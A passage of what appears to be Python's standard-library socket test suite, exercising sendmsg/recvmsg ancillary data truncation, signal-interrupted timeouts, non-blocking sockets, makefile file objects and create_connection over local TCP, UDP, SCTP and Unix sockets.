self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
